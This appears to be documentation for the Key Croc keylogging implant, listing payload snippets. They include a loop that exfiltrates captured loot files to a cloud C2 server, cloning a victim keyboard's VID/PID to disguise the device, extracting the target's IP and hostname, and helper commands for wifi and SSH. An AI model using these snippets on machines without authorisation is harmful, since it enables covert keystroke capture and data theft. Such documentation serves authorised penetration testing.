Helpful Payload Snippets

EXFILTRATE MULTIPLE FILES USING C2EXFIL

The C2EXFIL tool, used to exfiltrate files to the configured Cloud C2 server, normally only handles one file at a time. Using a for loop, one may iterate over multiple files in a directory.

FILES="$LOOT_DIR/*.txt"
for f in $FILES; do C2EXFIL STRING $f Example; done

ADD AN ATTACKMODE WITH THE CLONED VID AND PID VALUES

By default the Key Croc boots into Attack Mode and clones the VID and PID values of the connected human interface device (HID Keyboard).

The VID and PID values are stored in the /tmp/vidpid directory and may be referenced in a payload using the following:

# Set ATTACKMODE to HID and Ethernet with cloned keyboard VID/PID
VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
ATTACKMODE HID ECM_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT

CHECKING CURRENT MODE (ATTACK OR ARMING)

If the Key Croc is in the Attack Mode, rather than Arming Mode, the /tmp/attackmode file will exist.

Checking the current ATTACKMODE

The Key Croc stores its current ATTACKMODE in the file /tmp/mode. In addition to the ATTACKMODE options like HID or SERIAL, the /tmp/mode file reports all additional parameters such as VID and PID. These values may be passed to a new ATTACKMODE command using the bash command substitution feature. In this example, the output of "cat /tmp/mode", inside of the $() directive, is substituted.

root@croc:~# cat /tmp/mode
HID VID_0X04B3 PID_0X3025
root@croc:~# ATTACKMODE ECM_ETHERNET $(cat /tmp/mode)
TARGET_IP = 172.16.64.10, TARGET_HOSTNAME = kali, HOST_IP = 172.16.64.1
root@croc:~#

GETTING THE TARGET HOSTNAME AND IP ADDRESS

While the ECM_ETHERNET and RNDIS_ETHERNET options for ATTACKMODE will display the Target IP address and hostname interactively, these values may also be used in a payload. To store these values in a variable, use the following:

GET_VARS
# This exports the following variables:
$TARGET_IP
$TARGET_HOSTNAME
$HOST_IP

Alternatively, these target values may be obtained from the following:

TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')

And the host IP (the IP address of the Key Croc itself) can be determined with the following:

HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})

However, unless changed from its default this value will be 172.16.64.1.

FRAMEWORK HELPERS

From firmware 1.3+, many functions of the Key Croc may be exposed by sourcing the croc_framework. The GET_HELPERS command provides an outline of their functions:

root@croc:~/loot# GET_HELPERS
Available helper functions provided by sourcing croc_framework

MOUNT_UDISK
 Mounts udisk and handles syncing /root/loot/ and /root/udisk/loot

UNMOUNT_UDISK
 Safely Unmounts udisk

UPDATE_LANGUAGES
 Copy language files from udisk to the croc

ENABLE_INTERFACE
 Enables wlan0

CLEAR_WIFI_CONFIG
 Remove wpa_supplicant.conf to clear current wireless configuration

CONFIG_OPEN_WIFI
 Generate a wpa_supplicant.conf for open wifi
 Example: CONFIG_OPEN_WIFI 'attwifi'

CONFIG_PSK_WIFI
 Generate a wpa_supplicant.conf for psk wifi
 Example: CONFIG_PSK_WIFI 'attwifi' 'password'

START_WLAN_DHCP
 Start dhcp on wlan0

ENABLE_WIFI
 Enable wifi helper
 configures wpa_supplicant, indicates using LED,
 enables interface, starts wpa_supplicant and dhcp
 Example psk: ENABLE_WIFI 'attwifi' 'password'
 Example open: ENABLE_WIFI 'attwifi'

DISABLE_SSH
 Disable SSH service

ENABLE_SSH
 Enable SSH service

Last updated